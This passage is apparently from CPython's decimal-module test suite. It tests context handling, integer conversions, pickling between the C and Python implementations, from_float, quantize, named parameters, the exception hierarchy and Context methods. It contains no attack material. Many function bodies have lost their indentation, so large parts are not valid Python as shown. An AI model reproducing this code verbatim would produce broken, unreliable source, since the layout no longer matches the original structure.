        self.assertTrue(c.flags[Overflow])

        # to_eng_string honours the context's `capitals` setting
        c.capitals = 0
        self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
        c.capitals = 1

        ##### Binary functions
        c.clear_flags()
        ans = str(x.compare(Decimal('Nan891287828'), context=None))
        self.assertEqual(ans, 'NaN1287828')
        self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.compare_signal(8224, context=None))
        self.assertEqual(ans, '-1')
        self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_and(101, context=None))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_or(101, context=None))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_xor(101, context=None))
        self.assertEqual(ans, '10')
        self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.max(101, context=None))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.max_mag(101, context=None))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.min(101, context=None))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.min_mag(101, context=None))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.remainder_near(101, context=None))
        self.assertEqual(ans, '10')
        self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.rotate(2, context=None))
        self.assertEqual(ans, '11100')
        self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.scaleb(7, context=None))
        self.assertEqual(ans, '1.11E+9')
        self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.shift(2, context=None))
        self.assertEqual(ans, '11100')
        self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        ##### Ternary functions
        c.clear_flags()
        ans = str(x.fma(2, 3, context=None))
        self.assertEqual(ans, '225')
        self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
        self.assertTrue(c.flags[Overflow])

        ##### Special cases
        # rounding=None picks up the context's current rounding mode
        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.rounding = ROUND_UP
        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
        self.assertEqual(ans, '1.501')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
        self.assertEqual(ans, '1.500')
        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '1.501')
        c.clear_flags()
        self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
        self.assertTrue(c.flags[InvalidOperation])

    with localcontext(Context()) as context:
        context.prec = 7
        context.Emax = 999
        context.Emin = -999
        # localcontext(ctx=None) copies the *current* context
        with localcontext(ctx=None) as c:
            self.assertEqual(c.prec, 7)
            self.assertEqual(c.Emax, 999)
            self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
# Run the UsabilityTest suite against the C implementation (_decimal).
class CUsabilityTest(UsabilityTest):
    decimal = C
# Run the UsabilityTest suite against the pure-Python implementation.
class PyUsabilityTest(UsabilityTest):
    decimal = P
class PythonAPItests(unittest.TestCase):
    # Tests of Decimal's integration with Python-level APIs (numbers ABCs,
    # pickle, int/float conversion, ...).  Subclasses select the decimal
    # implementation via the `decimal` class attribute.

    def test_abc(self):
        """Decimal registers as numbers.Number but not numbers.Real."""
        Decimal = self.decimal.Decimal
        self.assertTrue(issubclass(Decimal, numbers.Number))
        self.assertFalse(issubclass(Decimal, numbers.Real))
        self.assertIsInstance(Decimal(0), numbers.Number)
        self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
    """Decimals and DecimalTuples pickle at every protocol, and pickles
    interchange between the C and Python implementations (whichever module
    is installed as sys.modules['decimal'] at load time wins)."""
    for proto in range(pickle.HIGHEST_PROTOCOL + 1):
        Decimal = self.decimal.Decimal

        savedecimal = sys.modules['decimal']

        # Round trip
        sys.modules['decimal'] = self.decimal
        d = Decimal('-3.141590000')
        p = pickle.dumps(d, proto)
        e = pickle.loads(p)
        self.assertEqual(d, e)

        if C:
            # Test interchangeability
            x = C.Decimal('-3.123e81723')
            y = P.Decimal('-3.123e81723')

            sys.modules['decimal'] = C
            sx = pickle.dumps(x, proto)
            sys.modules['decimal'] = P
            r = pickle.loads(sx)
            self.assertIsInstance(r, P.Decimal)
            self.assertEqual(r, y)

            sys.modules['decimal'] = P
            sy = pickle.dumps(y, proto)
            sys.modules['decimal'] = C
            r = pickle.loads(sy)
            self.assertIsInstance(r, C.Decimal)
            self.assertEqual(r, x)

            # Same interchange test for the DecimalTuple named tuple.
            x = C.Decimal('-3.123e81723').as_tuple()
            y = P.Decimal('-3.123e81723').as_tuple()

            sys.modules['decimal'] = C
            sx = pickle.dumps(x, proto)
            sys.modules['decimal'] = P
            r = pickle.loads(sx)
            self.assertIsInstance(r, P.DecimalTuple)
            self.assertEqual(r, y)

            sys.modules['decimal'] = P
            sy = pickle.dumps(y, proto)
            sys.modules['decimal'] = C
            r = pickle.loads(sy)
            self.assertIsInstance(r, C.DecimalTuple)
            self.assertEqual(r, x)

        sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
    """Decimal.from_float: subclass construction, exact binary expansion,
    big ints, NaN/Inf handling, type errors, and float round-tripping."""
    Decimal = self.decimal.Decimal

    class MyDecimal(Decimal):
        def __init__(self, _):
            # Deliberately ignores the value: from_float must still run
            # the subclass __init__.
            self.x = 'y'

    self.assertTrue(issubclass(MyDecimal, Decimal))

    r = MyDecimal.from_float(0.1)
    self.assertEqual(type(r), MyDecimal)
    # the exact binary value of the double nearest to 0.1
    self.assertEqual(str(r),
            '0.1000000000000000055511151231257827021181583404541015625')
    self.assertEqual(r.x, 'y')

    bigint = 12345678901234567890123456789
    self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
    self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
    self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
    self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
    self.assertEqual(str(MyDecimal.from_float(float('nan'))),
                     str(Decimal('NaN')))
    self.assertEqual(str(MyDecimal.from_float(float('inf'))),
                     str(Decimal('Infinity')))
    self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
                     str(Decimal('-Infinity')))
    self.assertRaises(TypeError, MyDecimal.from_float, 'abc')

    # random floats of widely varying magnitude round-trip exactly
    for i in range(200):
        x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
        self.assertEqual(x, float(MyDecimal.from_float(x)))  # roundtrip
def test_create_decimal_from_float(self):
    """Context.create_decimal_from_float honours the context's precision,
    rounding mode, and traps (unlike Decimal.from_float, which is exact)."""
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    Inexact = self.decimal.Inexact

    context = Context(prec=5, rounding=ROUND_DOWN)
    self.assertEqual(
        context.create_decimal_from_float(math.pi),
        Decimal('3.1415')
    )
    context = Context(prec=5, rounding=ROUND_UP)
    self.assertEqual(
        context.create_decimal_from_float(math.pi),
        Decimal('3.1416')
    )
    # An enabled Inexact trap fires when rounding loses digits.
    context = Context(prec=5, traps=[Inexact])
    self.assertRaises(
        Inexact,
        context.create_decimal_from_float,
        math.pi
    )
    self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
                     "Decimal('-0')")
    self.assertEqual(repr(context.create_decimal_from_float(1.0)),
                     "Decimal('1')")
    self.assertEqual(repr(context.create_decimal_from_float(10)),
                     "Decimal('10')")
def test_quantize(self):
    """quantize(): default rounding, explicit rounding, out-of-range
    exponents, and full keyword-argument invocation."""
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    InvalidOperation = self.decimal.InvalidOperation

    c = Context(Emax=99999, Emin=-99999)
    # default context rounding (half-even)
    self.assertEqual(
        Decimal('7.335').quantize(Decimal('.01')),
        Decimal('7.34')
    )
    self.assertEqual(
        Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
        Decimal('7.33')
    )
    # a target exponent beyond Emax is an invalid operation
    self.assertRaises(
        InvalidOperation,
        Decimal("10e99999").quantize, Decimal('1e100000'), context=c
    )

    c = Context()
    d = Decimal("0.871831e800")
    # all arguments may be passed by keyword
    x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
    self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
    """The documented decimal signal/exception hierarchy is intact,
    including the multiple-inheritance edges (FloatOperation/TypeError,
    DivisionByZero/ZeroDivisionError, Overflow and Underflow mix-ins)."""
    decimal = self.decimal
    DecimalException = decimal.DecimalException
    InvalidOperation = decimal.InvalidOperation
    FloatOperation = decimal.FloatOperation
    DivisionByZero = decimal.DivisionByZero
    Overflow = decimal.Overflow
    Underflow = decimal.Underflow
    Subnormal = decimal.Subnormal
    Inexact = decimal.Inexact
    Rounded = decimal.Rounded
    Clamped = decimal.Clamped

    self.assertTrue(issubclass(DecimalException, ArithmeticError))

    self.assertTrue(issubclass(InvalidOperation, DecimalException))
    self.assertTrue(issubclass(FloatOperation, DecimalException))
    self.assertTrue(issubclass(FloatOperation, TypeError))
    self.assertTrue(issubclass(DivisionByZero, DecimalException))
    self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
    self.assertTrue(issubclass(Overflow, Rounded))
    self.assertTrue(issubclass(Overflow, Inexact))
    self.assertTrue(issubclass(Overflow, DecimalException))
    self.assertTrue(issubclass(Underflow, Inexact))
    self.assertTrue(issubclass(Underflow, Rounded))
    self.assertTrue(issubclass(Underflow, Subnormal))
    self.assertTrue(issubclass(Underflow, DecimalException))
    self.assertTrue(issubclass(Subnormal, DecimalException))
    self.assertTrue(issubclass(Inexact, DecimalException))
    self.assertTrue(issubclass(Rounded, DecimalException))
    self.assertTrue(issubclass(Clamped, DecimalException))

    # internal conditions all derive from InvalidOperation
    self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
    self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
    self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
    self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
    self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
# Run the PythonAPItests suite against the C implementation (_decimal).
class CPythonAPItests(PythonAPItests):
    decimal = C
# Run the PythonAPItests suite against the pure-Python implementation.
class PyPythonAPItests(PythonAPItests):
    decimal = P
class ContextAPItests(unittest.TestCase):
    # Tests of the Context class API itself.  Subclasses select the decimal
    # implementation via the `decimal` class attribute.

    def test_none_args(self):
        """Context(prec=None, ...) is identical to a default Context()."""
        Context = self.decimal.Context
        InvalidOperation = self.decimal.InvalidOperation
        DivisionByZero = self.decimal.DivisionByZero
        Overflow = self.decimal.Overflow

        c1 = Context()
        c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
                     capitals=None, clamp=None, flags=None, traps=None)
        for c in [c1, c2]:
            self.assertEqual(c.prec, 28)
            self.assertEqual(c.rounding, ROUND_HALF_EVEN)
            self.assertEqual(c.Emax, 999999)
            self.assertEqual(c.Emin, -999999)
            self.assertEqual(c.capitals, 1)
            self.assertEqual(c.clamp, 0)
            assert_signals(self, c, 'flags', [])
            assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
                                              Overflow])
@cpython_only
def test_from_legacy_strings(self):
    """Legacy (non-canonical) unicode strings are accepted for valid
    rounding-mode names but rejected when empty or containing NUL."""
    import _testcapi
    c = self.decimal.Context()

    for rnd in RoundingModes:
        c.rounding = _testcapi.unicode_legacy_string(rnd)
        self.assertEqual(c.rounding, rnd)

    s = _testcapi.unicode_legacy_string('')
    self.assertRaises(TypeError, setattr, c, 'rounding', s)

    s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
    self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
    """Contexts pickle at every protocol; randomized attribute combinations
    interchange between the C and Python implementations."""
    for proto in range(pickle.HIGHEST_PROTOCOL + 1):
        Context = self.decimal.Context

        savedecimal = sys.modules['decimal']

        # Round trip
        sys.modules['decimal'] = self.decimal
        c = Context()
        e = pickle.loads(pickle.dumps(c, proto))

        self.assertEqual(c.prec, e.prec)
        self.assertEqual(c.Emin, e.Emin)
        self.assertEqual(c.Emax, e.Emax)
        self.assertEqual(c.rounding, e.rounding)
        self.assertEqual(c.capitals, e.capitals)
        self.assertEqual(c.clamp, e.clamp)
        self.assertEqual(c.flags, e.flags)
        self.assertEqual(c.traps, e.traps)

        # Test interchangeability
        combinations = [(C, P), (P, C)] if C else [(P, P)]
        for dumper, loader in combinations:
            for ri, _ in enumerate(RoundingModes):
                for fi, _ in enumerate(OrderedSignals[dumper]):
                    for ti, _ in enumerate(OrderedSignals[dumper]):

                        prec = random.randrange(1, 100)
                        emin = random.randrange(-100, 0)
                        emax = random.randrange(1, 100)
                        caps = random.randrange(2)
                        clamp = random.randrange(2)

                        # One module dumps
                        sys.modules['decimal'] = dumper
                        c = dumper.Context(
                            prec=prec, Emin=emin, Emax=emax,
                            rounding=RoundingModes[ri],
                            capitals=caps, clamp=clamp,
                            flags=OrderedSignals[dumper][:fi],
                            traps=OrderedSignals[dumper][:ti]
                        )
                        s = pickle.dumps(c, proto)

                        # The other module loads
                        sys.modules['decimal'] = loader
                        d = pickle.loads(s)
                        self.assertIsInstance(d, loader.Context)

                        self.assertEqual(d.prec, prec)
                        self.assertEqual(d.Emin, emin)
                        self.assertEqual(d.Emax, emax)
                        self.assertEqual(d.rounding, RoundingModes[ri])
                        self.assertEqual(d.capitals, caps)
                        self.assertEqual(d.clamp, clamp)
                        assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
                        assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])

        sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
